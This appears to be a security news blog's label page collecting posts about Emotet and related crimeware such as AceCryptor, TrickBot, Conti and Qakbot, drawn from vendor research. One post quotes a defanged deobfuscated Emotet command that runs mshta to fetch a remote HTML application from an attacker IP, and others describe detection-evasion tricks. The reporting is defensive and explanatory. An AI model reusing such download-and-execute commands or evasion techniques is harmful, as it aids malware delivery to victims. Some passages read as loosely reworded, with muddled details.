Search This Blog
Powered by Blogger.

Blog Archive

Labels

About Me

Load More
Trendy Right Now

Popular Posts

Showing posts with label Emotet. Show all posts
Smokeloader
AceCryptor Cryptor cryptor-as-a-service (CaaS) cryptor-malware Emotet malware malware programmers Smokeloader

What is AceCryptor Malware? A Quick Insight


AceCryptor first appeared in the year 2016. Since, this cryptor has been used to pack tens of malware to date, many of its technical components have already been discussed and detailed. We may already be familiar with this cryptor, sometimes referred to as the DJVU obfuscation, SmokeLoader's stage 1, RedLine stealer's stage 1, 2, and 3, easy and popular packer, etc. Let us connect the dots for you by offering not only a technical analysis of its variants but also an overview of the malware families that can be found packed by it and how common AceCryptor is in the wild. Many (but not all) of the published blog posts fail to even recognize this cryptor as a separate malware family.

For malware programmers, protecting their malwares from being detected is a challenge. The first line of protection against malware from getting distributed is cryptors. Threat actors are capable of designing and maintaining their own unique cryptors, however, for crimeware threat actors, keeping their cryptor in a condition known as FUD (fully undetectable) is frequently a time-consuming or technically challenging task. Numerous malware-packed cryptor-as-a-service (CaaS) alternatives have emerged in response to the demand for this protection. These cryptors can combine several anti-VM, anti-debugging, and anti-analysis approaches to achieve payload hiding.

Since its establishment, AceCryptor has been used by several malware programmers. Its services were even used by crimeware like Emotet, which did not have its own cryptor at that time. During 2021-22, software company ESET found more than 80,000 different AceCryptor samples. It is believed that AceCryptor is offered somewhere as a CaaS due to the significant variety of malware families that are crammed inside. Even if we are not aware of the exact cost of this service, if we take into account the number of unique files found, we may conclude that the benefits to the AceCryptor creators are indeed not insignificant.

Taking into account that AceCryptor is used by a wide range of threat actors, malware packed by it is also distributed in a variety of ways. Based on ESET telemetry, devices were primarily exposed to AceCryptor-packed malware through spam emails with dangerous attachments or trojanized installers of piracy software.

Additionally, other malware that downloads new malware protected by AceCryptor may as well expose a user to AceCryptor-packed malware. The Amadey botnet, which we have seen downloading an AceCryptor-packed RedLine Stealer, serves as an example.

Currently, AceCryptor works as a significantly long-lasting cryptor-malware. It is anticipated that it is offered as a CaaS on some dark web or underground forums. Tens of different malware families have utilized the services of this virus, and many of them rely on this cryptor as their primary defense against static detections.

Since this malware is used by several threat actors, it is capable of affecting anyone. Considering the diversity of packed malware, it is challenging to predict how severe the repercussions are for a victim. AceCryptor may have been downloaded by additional malware or may have been dropped by other malware that was already active on the victim's computer. If the victim was directly affected, such as by opening a malicious email attachment, it may be very challenging to clean the compromised system.

Read more »
TTPs
Cyber Security Emotet HTML ICedID ISO files Proofpoint Qakbot TTPs

Microsoft: Hackers Exploring New Attack Techniques

Malicious actors are adapting their strategies, techniques, and procedures in response to Microsoft's move to automatically block Excel 4.0 (XLM or XL4) and Visual Basic for Applications (VBA) macros across Office programs (TTPs).

Malicious Microsoft Office document attachments sent in phishing emails often contain VBA and XL4 Macros, two short programs designed to automate repetitive processes in Microsoft Office applications that threat actors use to load, drop, or install malware.

Sherrod DeGrippo, vice president of threat research and detection at Proofpoint, stated "the threat landscape has changed significantly as a result of threat actors shifting away from directly disseminating macro-based email attachments."

The change was made as a result of Microsoft's announcement that it will stop the widespread exploitation of the Office subsystem by making it more challenging to activate macros and automatically banning them by default.

New tactics 

Use of ISO, RAR, and Windows Shortcut (LNK) attachments to get around the block has multiplied by 66%, according to security firm Proofpoint, which calls this activity 'one of the largest email threat landscape shifts in recent history.' Actors spreading the Emotet malware are also involved in this activity.

The use of container files like ISOs, ZIPs, and RARs has also increased rapidly, increasing by about 175 percent. These are rapidly being used as initial access mechanisms by threat actors, between October 2021 and June 2022, the use of ISO files surged by over 150 percent.

Since October 2021, the number of campaigns including LNK files has climbed by 1,675%. Proofpoint has been tracking a variety of cybercriminal and advanced persistent threat (APT) actors who frequently use LNK files.

Emotet, IcedID, Qakbot, and Bumblebee are some of the famous malware families disseminated using these new techniques.

According to Proofpoint, the usage of HTML attachments employing the HTML smuggling approach to put a botnet on the host system has also increased significantly. Their distribution volumes, however, are still quite limited.

Finally, with a restricted range of potential threats to assess, email security systems are now more likely to detect hazardous files.

Read more »
User Privacy
Botnet Conti Emotet Google Chrome malware Ransom Ransomware TrickBot Trojan User Data User Privacy

New Emotet Variant Capturing Users' Credit Card Data from Google Chrome

 

The Emotet botnet is now attempting to infect potential victims with a credit card stealer module designed to capture credit card information from Google Chrome user accounts. 

After obtaining credit card information (such as name, expiration month and year, and card numbers), the malware will transfer it to command-and-control (C2) servers that are not the same as those used by the Emotet card stealer module. 

The Proofpoint Threat Insights team said, "On June 6th, Proofpoint observed a new Emotet module being dropped by the E4 botnet. To our surprise, it was a credit card stealer that was solely targeting the Chrome browser. Once card details were collected they were exfiltrated to different C2 servers than the module loader." 

This shift in behaviour follows an increase in activity in April and a move to 64-bit modules, as discovered by the Cryptolaemus security research group. One week later, Emotet began using Windows shortcut files (.LNK) to run PowerShell instructions on victims' devices, abandoning Microsoft Office macros, which were disabled by default beginning in early April 2022. 

The re-emergence of Emotet malware:

In 2014, the Emotet malware was created and used in assaults as a banking trojan. It has developed into a botnet used by the TA542 threat group (also known as Mummy Spider) to deliver second-stage payloads. 

It also enables its operators to steal user data, conduct reconnaissance on compromised networks, and migrate laterally to susceptible devices. Emotet is renowned for deploying Qbot and Trickbot malware trojan payloads on infected PCs, which are then used to spread more malware, such as Cobalt Strike beacons and ransomware like Ryuk and Conti. Emotet's infrastructure was destroyed in early 2021 as part of an international law enforcement operation that also resulted in the arrest of two people.

When Emotet research organisation Cryptolaemus, computer security firm GData, and cybersecurity firm Advanced Intel all spotted the TrickBot malware being used to deliver an Emotet loader in November 2021, the botnet returned utilising TrickBot's previously established infrastructure.

According to ESET, Emotet's activity has increased more than 100-fold since the beginning of the year, with its activity rising more than 100-fold against T3 2021.
Read more »
RaaS
Conti Ransomware Cyber Attacks Dark Web Emotet Encrypted Files Microsoft Qakbot RaaS

Costa Rica's New Government is Under Attack by a Conti Ransomware Gang

 

The Conti ransomware organization, which has hacked some Costa Rican government computer systems, has increased its threat, claiming that its ultimate goal is to overthrow the government. The Russian-speaking Conti gang tried to intensify the pressure to pay a ransom by boosting its demand to $20 million, perhaps capitalizing on the fact that President Rodrigo Chaves had just been in office for a week. 

"We are aiming to overthrow the government by a cyber attack, and we have already demonstrated all of our strength and power," the group stated on its official website. "In your government, we have insiders. We're also attempting to obtain access to your other systems, and you have no choice but to pay us." Chaves said the organization had infiltrated up to 27 institutions at various levels of government, declaring that the country was "at war" with the Conti ransomware gang but giving no indication that the ransom would be paid. 

"I appeal to every Costa Rican to go to your government and organize rallies to demand that they pay us as soon as possible if your existing government is unable to fix the situation?" A different statement on Conti's dark web page stated, "Perhaps it's worth replacing." Over the weekend, the ransomware issued a warning that it will remove the decryption keys in a week, making it impossible for Costa Rica to restore access to the ransomware-encrypted files. 

The lethal April 19 attack prompted the new administration to proclaim a state of emergency, and the gang has exposed troves of data acquired from infected systems before encryption. Conti linked the attack to an affiliate actor nicknamed "UNC1756," a play on the name given to uncategorized threat groups by threat intelligence firm Mandiant. 

If it was any other ransomware gang, according to Aaron Turner, vice president of SaaS posture at Vectra, an AI cybersecurity firm, the threat would be unnoticeable. "However, because it's Conti, and Conti has publicly connected themselves with Putin's Russia's military activities, this threat should demand a second look," he said. 

He believes that if the US supports 'enemy' troops in Russia's neighborhood, there is a strong urge for retaliation. "Fortunately for Costa Rica, Conti isn't the most sophisticated gang of ransomware operators," he said. "Costa Rica is also lucky in that Russia's invasion of Ukraine went so badly that there are likely inadequate military forces on the other side of the planet to launch a combined cyberattack and conventional strike." While the prospect of overthrow is intriguing from an academic standpoint, Turner believes the chances of Conti orchestrating a coup are extremely remote. 

Affiliates are hacker organizations that rent access to pre-developed ransomware tools to coordinate assaults on corporate networks as part of the so-called ransomware-as-a-service (RaaS) gig economy, and then share the profits with the operators. Conti has continued to target companies all over the world after suffering a large data breach of its own earlier this year amid its public support for Russia in its current war against Ukraine. 

Conti is the "most prolific ransomware-associated cybercriminal activity organization operational today," according to Microsoft's security team, which records the cybercriminal gang under the cluster DEV-0193. "DEV-0193 has hired developers from other malware operations that have shut down for varied reasons, including legal actions. The addition of developers from Emotet, Qakbot, and IcedID to the DEV-0193 umbrella is very noteworthy." 

Conti is one of the most wanted cybercriminal gangs in the world, with the US State Department offering up to $10 million in incentives for any information leading to the identity of its senior members.
Read more »
Spam
Banking Trojan Cyber Attacks Cyberattacks DHL Express DLL load hijacking Emotet Kaspersky malspam Outlook PayPal PowerShell Spam

Emotet : The Infamous Botnet Has Returned

 

Kaspersky researchers were able to retrieve and analyze 10 out of 16 modules, with most having been used by Emotet in the past in one form or another. Kaspersky Lab was created in 1997 as multinational cybersecurity and digital privacy organization. Kaspersky's deep risk intelligence and security expertise are continually evolving into new security solutions and services to safeguard enterprises, vital infrastructure, governments, and consumers all around the world. 

Emotet was discovered in the wild for the first time in 2014. Its major purpose back then was to steal user's financial credentials. Since then, it has gone through several modifications, began transmitting other viruses, and eventually evolved into a strong botnet. Emotet is a type of malware classified as banking Trojans. Malspam, or spam emails with malware, is the most common way for it to propagate. To persuade users, these communications frequently contain familiar branding, imitating the email structure of well-known and trustworthy companies such as PayPal or DHL. 

As per Kaspersky telemetry, the number of victims increased from 2,843 in February 2022 to 9,086 in March 2022, indicating the attackers targeted more than three times the number of users. As a result, the number of threats detected by Kaspersky solutions has increased, from 16,897 in February 2022 to 48,597 in March 2022. 

A typical Emotet infection starts with spam e-mails containing malicious macros in Microsoft Office attachments. The actor can use this macro to launch a malicious PowerShell command which will drop and start a module loader, which will then talk with a command and control server to download and start modules. In the percent Windows percent SysWOW64 or percent User percent AppDataLocal directory, Emotet creates a subfolder with a random name and replicates itself under a completely random name and extension. The exported Control RunDLL method is used to launch the Emotet DLL's primary activity. These modules can be used to carry out a range of actions on the infected computer. Kaspersky researchers were able to extract and evaluate 10 of the 16 modules, the majority of which had previously been utilized by Emotet. 

Researchers now state that the Emotet can download 16 modules judging by the recent Emotet protocol and C2 answers. They were able to recover ten of them (including two separate copies of the Spam module), which were utilized by Emotet to steal credentials, passwords, accounts, and e-mail addresses, as well as spam. We present a brief examination of these modules and also statistics on current Emotet attacks in this post. 

To gather the account details of various email clients, the current version of Emotet can create automated spam campaigns which are further spread down the network from infected devices, retrieving emails and email addresses from Thunderbird and Outlook apps and accumulating passwords from popular web browsers like Internet Explorer, Mozilla Firefox, Google Chrome, Safari, and Opera. 

Emotet infects computers in businesses and homes all around the world. As per our telemetry, Emotet most frequently targeted users from the following countries in Q1 2022: Italy (10.04%), Russia (9.87%), Japan (8.55%), Mexico (8.36%), Brazil (6.88%), Indonesia (4.92%), India (3.21%), Vietnam (2.70%), China (2.62), Germany (2.19%) and Malaysia (2.13%). 

The present set of components is capable of a wide range of malicious activities, including stealing e-mails, passwords, and login data from a variety of sources, as well as spamming. Except for the Thunderbird components, Emotet has utilized all of these modules in some form or another before. However, there are still a few modules that we haven't been able to get our hands-on.
Read more »
Windows CaaS
Binaries Conti Crime Emotet Intel47 malware Research TrickBot Trojan Windows CaaS

TrickBot Group Likely Moving Operations to Switch to New Malware

 

TrickBot, the notorious Windows crimeware-as-a-service (CaaS) solution used by several threat actors to distribute next-stage payloads like ransomware, looks to be in the midst of a transition, with no new activity since the beginning of the year. 

Researchers at Intel 471 stated in a study provided with The Hacker News that the slowdown in malware activities is partially due to a huge shift by Trickbot's operators, including working with the operators of Emotet. Even as the malware's command-and-control (C2) infrastructure continued to serve additional plugins and web injects to infected nodes in the botnet, the last round of TrickBot attacks was recorded on December 28, 2021. 

Surprisingly, the drop in campaign volume has coincided with the TrickBot gang collaborating closely with the operators of Emotet, which resurfaced late last year after a 10-month break due to law enforcement efforts to combat the malware. The attacks, which began in November 2021, comprised an infection sequence that utilized TrickBot to download and execute Emotet binaries, whereas Emotet binaries were frequently used to drop TrickBot samples previous to the shutdown. 

The researchers stated, "It's likely that the TrickBot operators have phased TrickBot malware out of their operations in favour of other platforms, such as Emotet. TrickBot, after all, is relatively old malware that hasn't been updated in a major way." 

Additionally, immediately after Emotet's comeback in November 2021, Intel 471 discovered instances of TrickBot sending Qbot installs to the infected systems, highlighting the possibility of a behind-the-scenes shake-up to relocate to other platforms. With TrickBot becoming more visible to law enforcement in 2021, it's not unexpected that the threat actor behind it is actively working to change tactics and modify their protective mechanisms. 

"Perhaps a combination of unwanted attention to TrickBot and the availability of newer, improved malware platforms has convinced the operators of TrickBot to abandon it. We suspect that the malware control infrastructure (C2) is being maintained because there is still some monetization value in the remaining bots," the researchers added.

According to a separate investigation published last week by Advanced Intelligence (AdvIntel), the Conti ransomware group is thought to have acqui-hired several elite TrickBot developers to deactivate the malware and replace it with improved variations like BazarBackdoor.
Read more »
Windows
Emotet Excel File malware PowerShell Windows

Malicious Excel Files are Now Being Used to Spread Emotet Malware

 

Researchers discovered that the infamous Emotet malware has altered methods yet again, this time in an email campaign propagated by infected Excel files. In a report released online on Tuesday, researchers from Palo Alto Networks Unit 42 detected a new infection strategy for the high-volume malware, which is known to alter and change its attack vectors to avoid detection and continue its malicious job. 

Emotet was found in 2014 as a banking trojan, and it has been quite active in recent years. The Emotet botnet infrastructure was taken down in January 2021 by law enforcement and judicial agencies, but Emotet resurfaced in November 2021 and has remained active since then. Thread hijacking is a common attack tactic used by Emotet. This method generates bogus responses based on legitimate emails obtained from mail clients of Emotet-infected Windows hosts. This stolen email data is used by the botnet to generate false replies imitating the original senders. 

The new attack vector, found on December 21 and still active, sends an Excel file with an obfuscated Excel 4.0 macro via socially engineered emails. These macros are an ancient Excel feature that malicious actors routinely exploit. Before the malicious content can be activated, the victim must enable macros on a vulnerable Windows host. 

When the macro code is enabled, cmd.exe is executed to launch mshta.exe with an argument to obtain and run a remote HTML application. In order to avoid static detection methods, the code employs hex and character obfuscation, cmd /c mshta hxxp://91.240.118[.]168/se/s.html is the deobfuscated command string that is executed. The HTML application has been heavily obfuscated. It will download and run additional PowerShell code.

The first PowerShell script is obfuscated and connects to hxxp://91.240.118[.]168/se/s.png. This URL delivers a text-based script for a second-stage set of PowerShell code aimed at retrieving an Emotet binary. This second-stage PowerShell code contains 14 URLs that will be used to retrieve the Emotet binaries. 

Each URL is tried until an Emotet binary is successfully downloaded. The use of numerous URLs strengthens this assault in the case that one of the URLs is taken down. As the final stage of this attack chain, the Emotet DLL loads an encrypted PE from its resource area. 

“Emotet’s new attack chain reveals multiple stages with different file types and obfuscated script before arriving at the final Emotet payload,” Unit 42 researchers Saqib Khanzada, Tyler Halfpop, Micah Yates and Brad Duncan wrote.
Read more »
Threat actors
Banking Trojan Cyber Crime Emotet Researchers Spam Threat actors

Emotet Spam Campaigns Use Unconventional IP Addresses to Avoid Detection

 

Trend Micro discovered Emotet spam campaigns that used hexadecimal and octal representations of IP addresses to avoid detection using pattern matching. Both processes rely on social engineering to deceive users into enabling document macros and automate malware execution. When these standards are received, operating systems (OS) automatically transform the data to the dotted decimal quad representation in order to commence the request from remote servers.

Users and enterprises are advised to detect, block, and enable the appropriate security measures to prevent compromise while using Emotet for second-stage malware transmission such as TrickBot and Cobalt Strike. 

Emotet first surfaced in 2014, when researchers found a relatively simple banking Trojan transmitted via phishing emails. It evolved several times over the years into a Malware-as-a-Service botnet, allowing access to compromised computers to those willing to pay. Unfortunately, there were a plethora of them, including ransomware gangs like Ryuk and the data-stealing malware Trickbot. These immediately took advantage of the initial access provided by Emotet, picking and choosing which victims to target with subsequent payloads. 

According to Europol, Emotet's capability to move laterally among devices on a network made it one of the most durable pieces of malware detected in recent years. In reality, it has become one of the most serious threats researchers have seen in recent years, constantly ranking among the top ten campaigns detected, with over 1.6 million victim machines, according to the DoJ. 

The samples researchers discovered begin with an email-attached document that employs Excel 4.0 Macros, an antiquated technology intended to automate repetitive processes in Excel that malicious actors have exploited to distribute malware. In this scenario, abusing the feature allows the malware to execute once the document is opened using the auto-open macro. Carets are used to obfuscate the URL, and the host contains a hexadecimal representation of the IP address. 

When the macro is run, it invokes cmd.exe > mshta.exe with the URL containing the hex representation of the IP address as an argument, which downloads and executes HTML application (HTA) code from the remote host. 

Between November and December 2021, traces of Emotet were seen arbitrarily dropping Cobalt Strike beacons. However, during this year, operators were notably more picky about which targets the beacons were dropped on. Evasion strategies like this could be interpreted as proof that attackers are continuing to innovate in order to defeat pattern-based detection technologies. Furthermore, the atypical use of hexadecimal and octal IP addresses may result in evasion of current solutions reliant on pattern matching.
Read more »
Subscribe to: Posts (Atom)